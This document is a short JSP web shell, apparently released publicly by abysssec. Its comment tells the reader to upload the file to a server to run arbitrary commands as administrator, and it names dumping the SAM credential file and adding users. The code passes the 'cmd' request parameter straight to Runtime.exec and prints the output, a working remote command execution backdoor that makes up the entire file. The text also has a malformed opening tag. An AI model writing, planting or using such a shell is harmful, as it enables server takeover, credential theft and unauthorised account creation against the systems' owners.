%@ page import="java.util.*,java.io.*"%> <% %> <%-- abysssec inc public material just upload this file with abysssec.jsp and execute your command your command will run as administrator . you can download sam file add user or do anything you want . note : please be gentle and don't obstructionism . vulnerability discovered by : abysssec.com --%>
<% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "
"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>